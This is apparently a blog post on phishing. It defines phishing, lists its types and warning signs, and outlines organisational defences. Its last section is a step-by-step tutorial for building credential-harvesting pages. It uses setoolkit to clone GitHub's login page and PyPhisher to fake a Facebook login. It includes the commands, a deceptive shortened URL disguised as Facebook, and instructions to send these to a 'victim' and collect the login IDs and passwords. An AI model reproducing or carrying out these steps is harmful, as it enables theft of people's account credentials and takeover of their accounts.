👉Phishing
Phishing is a type of
cyber security attack during which malicious actors send messages pretending to
be a trusted person or entity. Phishing messages manipulate a user, causing
them to perform actions like installing a malicious file, clicking a malicious
link or divulging sensitive information such as access credentials. Phishing is
the most common type of social engineering, which is a general term describing,
attempts to manipulate or trick computer users. Social engineering is an
increasingly common threat vector used in almost all security incidents. Social
engineering attacks, like phishing, are often combined with other threats, such
as malware, code injection and network attacks.
০Amazon phishing
email attempts to steal credit card information:
Attackers sent a
phishing email, which appeared to be from Amazon, attempting to steal user
credit card information. The email claimed that the user’s account was
deactivated due to too many login failures, and linked to a fake Amazon Billing
Center website, which instructed the user to re-enter their payment
information.
👉Types of Phishing Attacks:
There
are 5 types of phishig attacks-
1.
Email Phishing: Most
phishing attacks are sent via email. Attackers typically register fake domain
names that mimic real organizations and send thousands of common requests to
victims.
For fake domains, attackers may add
or replace characters (e.g. my-bank.com instead of mybank.com), use subdomains
(e.g. mybank.host.com) or use the trusted organization’s name as the email
username (e.g. mybank@host.com).
Many phishing emails use a sense of
urgency, or a threat, to cause a user to comply quickly without checking the
source or authenticity of the email.
੦Email phishing messages have one of the following goals:
§ Causing the user to click a link to
a malicious website, in order to install malware on their device.
§ Causing the user to download an
infected file and using it to deploy malware
§ Causing the user to click a link to
a fake website and submit personal data.
§ Causing the user to reply and
provide personal data.
2. Spear Phishing: Spear phishing includes malicious
emails sent to specific people. The attacker typically already has some or all
of the following information about the victim:
§
Name.
§
Place of
employment.
§
Job title.
§
Email
address.
§
Specific
information about their job role.
§
Trusted
colleagues, family members, or other contacts, and samples of their writing .
3. Whaling: Whaling attacks target senior management and
other highly privileged roles. The ultimate goal of whaling is the same as
other types of phishing attacks, but the technique is often very subtle. Senior
employees commonly have a lot of information in the public domain, and
attackers can use this information to craft highly effective attacks.
Typically, these attacks do not use tricks like malicious URLs and fake
links. Instead, they leverage highly personalized messages using information
they discover in their research about the victim. For example, whaling
attackers commonly use bogus tax returns to discover sensitive data about the
victim, and use it to craft their attack.
4. Smishing and Vishing: This is a phishing attack that uses a phone instead of written communication. Smishing involves sending fraudulent SMS messages, while vishing involves phone conversations.
In a typical voice phishing scam, an attacker pretends to be a scam investigator for a credit card company or bank, informing victims that their account has been breached. Criminals then ask the victim to provide payment card information, supposedly to verify their identity or transfer money to a secure account (which is really the attacker’s).
Vishing scams may also involve automated phone calls pretending to be from a trusted entity, asking the victim to type personal details using their phone keypad.
5. Angler Phishing: These attacks use fake social media accounts belonging to well known organizations. The attacker uses an account handle that mimics a legitimate organization (e.g. “@pizzahutcustomercare”) and uses the same profile picture as the real company account.
Attackers take advantage of consumers’ tendency to make complaints and request assistance from brands using social media channels. However, instead of contacting the real brand, the consumer contacts the attacker’s fake social account.
When attackers receive such a request, they might ask the customer to provide personal information so that they can identify the problem and respond appropriately. In other cases, the attacker provides a link to a fake customer support page, which is actually a malicious website.
👉Signs of Phishing
a) Threats or a Sense of Urgency: - Emails that threaten negative
consequences should always be treated with skepticism. Another strategy is to
use urgency to encourage or demand immediate action. Phishers hope that by
reading the email in a hurry, they will not thoroughly scrutinize the content
and will not discover inconsistencies.
b) Message Style: - An immediate indication of phishing is that a message
is written with inappropriate language or tone. If, for example, a colleague
from work sounds overly casual, or a close friend uses formal language, this
should trigger suspicion. Recipients of the message should check for anything
else that could indicate a phishing message.
c) Unusual Requests: - If an email requires you to perform non-standard
actions, it could indicate that the email is malicious. For example, if an
email claims to be from a specific IT team and asks for software to be
installed, but these activities are usually handled centrally by the IT
department, the email is probably malicious.
d) Linguistic Errors: - Misspellings and grammatical misuse are another sign of phishing emails. Most companies have set up spell checking in their email clients for outgoing emails. Therefore, emails with spelling or grammatical errors should raise suspicion, as they may not originate from the claimed source.
e) Request for Credentials, Payment
Information or Other Personal Details: - In many phishing emails, attackers create fake login
pages linked from emails that appear to be official. The fake login page
typically has a login box or a request for financial account information. If
the email is unexpected, the recipient should not enter login credentials or
click the link. As a precaution, recipients should directly visit the website
they think is the source of the email.
👉Protect
Organization from Phishing Attacks
Ø Employee Awareness Training: - It is paramount to train employees to
understand phishing strategies, identify signs of phishing, and report suspicious
incidents to the security team.
Similarly,
organizations should encourage employees to look for trust badges or stickers
from well-known cyber security or antivirus
companies before interacting with a website. This shows that the website is
serious about security, and is probably not fake or malicious.
Ø Deploy Email Security Solutions: - Modern email filtering solutions can protect against malware and other malicious payloads in email messages. Solutions can detect emails that contain malicious links, attachments, spam content, and language that could suggest a phishing attack.
Email security solutions automatically block and quarantine suspicious emails and use sandboxing technology to “detonate” emails to check if they contain malicious code.
Ø Make Use of Endpoint Monitoring and
Protection: - The increasing use of cloud services
and personal devices in the workplace has introduced many new endpoints that
may not be fully protected. Security teams must assume that some endpoints will
be breached by endpoint attacks. it is essential to monitor endpoints for
security threats and implement rapid remediation and response on compromised
devices.
Ø Conduct Phishing Attack Tests: - Simulated phishing attack testing can help security
teams evaluate the effectiveness of security awareness training programs, and
help end users better understand attacks. Even if your employees are good at
finding suspicious messages, they should be tested regularly to mimic real
phishing attacks. The threat landscape continues to evolve, and cyber attack
simulations must also evolve.
Ø Limit User Access to High-Value
Systems and Data: - Most
phishing methods are designed to trick human operators, and privileged user
accounts are attractive targets for cybercriminals. Restricting access to
systems and data can help protect sensitive data from leakage. Use the
principle of least privilege and only give access to users who absolutely need
it.
👉We need to know, how create a phishing page
There are many different tools for phishing. We will use setoolkit. It is a social engineering toolkit. This tool preinstalled in Kali Linux.
੦ Follow the below steps-
i. At first go to Kali Linux and open terminal.
ii. Write on this terminal – setoolkit.
iii. Now choose
option 1: Social - Engineering Attacks.

iv. Choose option 2: Website Attack Vectors.
v. Choose option 3: Credential
Harvester Attack Method.
vi. Choose option 2: Site Cloner.
vii. Now, enter POST back IP address, that means listener IP or Kali Linux IP: 192.168.29.144.
viii. Then, we have to give the URL of website we want to clone. We use, login
page of GitHub- https://github.com/login and press enter.
ix. Now, our listener is start.
x. Now, 192.168.29.144 this IP or listener IP send to the victim by
message, email or social media. When victim open 192.168.29.144 this IP by
browser, then our phishing page is open.
After opening phishing page, when the victim clicks on Sign in with his login Id and password then victim’s login Id and password will be show in Listener or Kali Linux and then attacker receives his Id and password.

There are many types of tools for Facebook phishing. We will use PyPhisher. So, we need to download PyPhisher from Github and after that we will use that tool for phishing.
੦Follow the below steps-
i. Go to
browser and search Pyphisher github.
ii. Go to this
link: https://github.com/KasRoudra/PyPhisher.
iii. Now, go to Code and copy the code.
https://github.com/KasRoudra/PyPhisher.git
iv. Then, open terminal on Kali Linux and write on this terminal - git clone https://github.com/KasRoudra/PyPhisher.git for cloning repository.
v. Now, PyPhisher directory is created, so, go
to the directory – cd PyPhisher.
Here we will use this tool - pyphisher.py
for creating phishing page.
vi. After that, run this tool - python3 pyphisher.py. Python3 must be pre-installed in kali linux
to use this tool.
vii. Now, choose option 1- Facebook Traditional for phishing.
viii. Then, you will see, two URLs are provided by pyphisher and write shadow url if you want otherwise press enter to skip.
For, custom url press y if you want. Here I have used custom url for phishing and after that our listener is start.
ix. Now, sent this url - https://www.facebook.com-login@is.gd/gkEZR8 to the victim by message, email or social media. When victim open this url by browser, then our phishing page is open.
After opening phishing page, when the victim clicks on Sign in with his facebook login Id and password then victim’s login Id and password will be show in Listener or Kali Linux and then attacker receives his Id and password.

















Comments
Post a Comment